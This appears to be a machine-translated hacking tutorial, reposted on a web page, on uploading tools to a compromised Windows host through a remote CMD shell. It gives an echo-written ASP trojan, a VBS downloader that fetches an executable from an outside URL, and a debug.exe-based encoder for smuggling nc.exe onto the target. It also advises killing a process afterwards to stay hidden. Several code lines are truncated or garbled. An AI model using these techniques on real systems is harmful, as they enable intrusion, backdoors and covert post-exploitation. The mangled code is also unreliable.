Do all in CMD shell

Time:2021-5-10

file transfer
CMD for overflow vulnerability   Shell, the biggest problem is how to upload files. Due to the prevalence of worms, the 139 or 445 ports needed to connect IPC $are blocked. In addition, WinXP system strengthens the protection of IPC $, and the method of uploading files through IPC $and default sharing is basically invalid. FTP and TFTP are two feasible methods. Since they are well known, this paper will not introduce them. There are also three methods that you are familiar with. To sum up, I would like to mention them again

1. Write asp Trojan with echo command.
The premise, of course, is that IIS is already installed on the target host.
General ASP Trojan “volume” is large, not suitable for direct use of echo command to write files, here I provide a compact.
The echo version is given directly

@echo ^ >up.asp

Notice that there’s only one line with no carriage return in the middle.
The generated up.asp can not be accessed by browser, only the following script can be used:

with wscript
if .arguments.count>dl.vbs
@echo w.open “get”,.arguments(0),0:w.send:if w.status^>200 then .echo “Error:”+w.status:.quit>>dl.vbs
@echo aso.type=1:aso.open:aso.write w.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbs

For example, Download ps.exe and save it to C: path

cscript dl.vbs http://www.sometips.com/soft/ps.exe c:\path\ps.exe

Note that this is done in the remote shell.

4. Any encoded file of echo is restored by script + debug.
Neither of the previous two methods can guarantee to pass through the firewall. Besides, unless you set up your own web server, general web resources are provided in the form of compressed files. If the target host does not have a decompression tool, there is no way. Well, it’s just a “trump card”!

The echo command can write characters whose ASCII code is less than 128, but not characters whose ASCII code is greater than or equal to 128. Only when the local file is recoded to a character that can be displayed, can it be written to the remote host conveniently. The first thing you can think of is Base64 encoding, which is the encoding method of email attachment. However, VBS does not support bit x, so the encoding and decoding are more complex. What’s more, the script’s ability to process files as binary streams is poor( Adodb.stream can write files in stream mode, but I can’t construct the corresponding data type. Binary data stream can be converted into string by using MIDB function, but not vice versa. It took me two days to solve the problem. If anyone can use VBS or JS to write any byte data to a file, please give me your advice.)

But only debug.exe. Many people know the principle. I will not introduce it. I will give the result directly – Coding script:

fp=wscript.arguments(0)
fn=right(fp,len(fp)-instrrev(fp,”\”))
with createobject(“adodb.stream”)
.type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str)
end with
sll=sl mod 65536:slh=sl\65536
with createobject(“scripting.filesystemobject”).opentextfile(fp&”.bat”,2,true)
.write “@echo str=”””
for i=1 to sl
bt=ascb(midb(str,i,1))
if bt>debug.vbs”+vbcrlf+”@echo +”””
next
.writeline “””>>debug.vbs”+vbcrlf+”@echo with wscript.stdout:r=vbcrlf”_
+”:for i=1 to len(str) step 48:.write “”e””+hex(256+(i-1)/2)”_
+”:for j=i to i+46 step 2:.write “” “”+mid(str,j,2):next:.write r:next>>debug.vbs”
.writeline “@echo .write “”rbx””+r+”””+hex(slh)+”””+r+””rcx””+r+”””+hex(sll)_
+”””+r+””n debug.tmp””+r+””w””+r+””q””+r:end with”_
+”>>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp “””&fn&”””&del debug.vbs”
end with

Save it as echo.vbs. Suppose you want to upload nc.exe, then enter the command on the local command line:

cscript echo.vbs nc.exe

You can also drag and drop the icon of the file to be transferred to the icon of the script file.
Wait a moment, an nc.exe.bat will be generated in the current directory. Open it with notepad and other editing tools, and you can see the following:

@echo str=”4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000″_>>debug.vbs
@echo +”504500004C010400B98EAE340000000000000000E0000F010B010500009800000062000000000000004C00000010000000B0000000004000001000000002000004000000000000000400000000000000003001000004000000000000030000000000100000100000000010000010000000000000100000000000000000000000″_>>debug.vbs
@echo +”002001003C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A0210100640100000000000000000000000000000000000000000000000000002E74657874000000″_>>debug.vbs
@echo +”70970000001000000098000000040000000000000000000000000000200000602E726461746100001704000000B0000000060000009C0000000000000000000000000000400000402E646174610000004452000000C00000003E000000A20000000000000000000000000000400000C02E696461746100005C07000000200100″_>>debug.vbs
…………
… (omit lines)
…………
@echo +””>>debug.vbs
@echo with wscript.stdout:r=vbcrlf:for i=1 to len(str) step 48:.write “e”+hex(256+(i-1)/2):for j=i to i+46 step 2:.write ” “+mid(str,j,2):next:.write r:next>>debug.vbs
@echo .write “rbx”+r+”0″+r+”rcx”+r+”E800″+r+”n debug.tmp”+r+”w”+r+”q”+r:end with>>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp “NC.EXE”&del debug.vbs

Select all  -》  copy  -》  Switch to the remote command line window  -》  Paste.
If the network speed is not very slow, the whole upload process will take about 20 seconds.

Some notes:
1. The large file transfer is unstable, which may cause the shell to die. So the smaller the file, the better. It is suggested that the original file should not exceed 100kb.
2. Before transferring large files, you can transfer a small file as a “warm-up” to let the 16 bit virtual machine ntvdm.exe reside in the background. After all files are transferred, for the sake of concealment, the ntvdm process should be killed.
3. Some CMD   Each shell command needs to attach two carriage returns, so nc.exe.bat can’t be used directly.
4. The length of a single command is limited, so we can’t complete all tasks with only one echo. Moreover, for the CMD provided by NC   Shell, a slightly longer command will make the shell exit automatically (overflow?). You can change “I”   mod   128 = 0 “statement to adjust the length of each echo command. The character of each echo is multiplied by 2.
5. It is OK to decode without script. The purpose of using scripts is to reduce the amount of data transferred (because the data is compressed). If I have time, I will write a more perfect script to strengthen the data compression ability and increase the data verification function.

It’s easy to upload files, of course, but a lot of windows tools are more convenient. As you go around looking for the tools you need, don’t forget windows itself.

123456 read the full text next page

Recommended Today

Looking for frustration 1.0

I believe you have a basic understanding of trust in yesterday’s article. Today we will give a complete introduction to trust. Why choose rust It’s a language that gives everyone the ability to build reliable and efficient software. You can’t write unsafe code here (unsafe block is not in the scope of discussion). Most of […]